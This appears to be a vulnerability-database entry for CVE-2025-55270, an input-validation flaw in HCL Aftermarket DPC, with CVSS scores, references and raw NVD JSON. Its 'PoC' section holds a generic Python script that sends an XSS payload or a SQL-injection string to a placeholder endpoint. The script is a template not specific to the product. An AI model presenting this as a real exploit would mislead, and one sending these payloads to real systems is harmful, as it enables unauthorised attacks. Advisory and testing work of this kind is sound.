CVE-2025-55270

Description

HCL Aftermarket DPC is affected by Improper Input Validation which allows an attacker to inject executable code and can carry out attacks such as XSS, SQL Injection, Command Injection etc.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE

版本信息未在提供的文本中明确指定

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://target-ip/vulnerable_endpoint"

# Malicious payload demonstrating potential injection
# Example: SQL Injection test or XSS payload
payload = "<script>alert('XSS')</script>" # or "' OR '1'='1"

# Send POST request with the payload
params = {
    "user_input": payload
}

try:
    response = requests.post(target_url, data=params)
    print(f"Status Code: {response.status_code}")
    if payload in response.text:
        print("[+] Potential Vulnerability Detected: Payload reflected in response.")
    else:
        print("[-] Payload not reflected. Further analysis required.")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-55270
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-55270
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-55270/
[4] VulDB https://vuldb.com/cve/CVE-2025-55270
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-55270", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:26.413", "lastModified": "2026-03-26T20:32:52.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Improper Input Validation which allows an attacker to inject executable code and can carry out attacks such as XSS, SQL Injection, Command Injection etc."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por una Validación de Entrada Inadecuada, lo que permite a un atacante inyectar código ejecutable y puede llevar a cabo ataques como XSS, Inyección SQL, Inyección de Comandos, etc."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}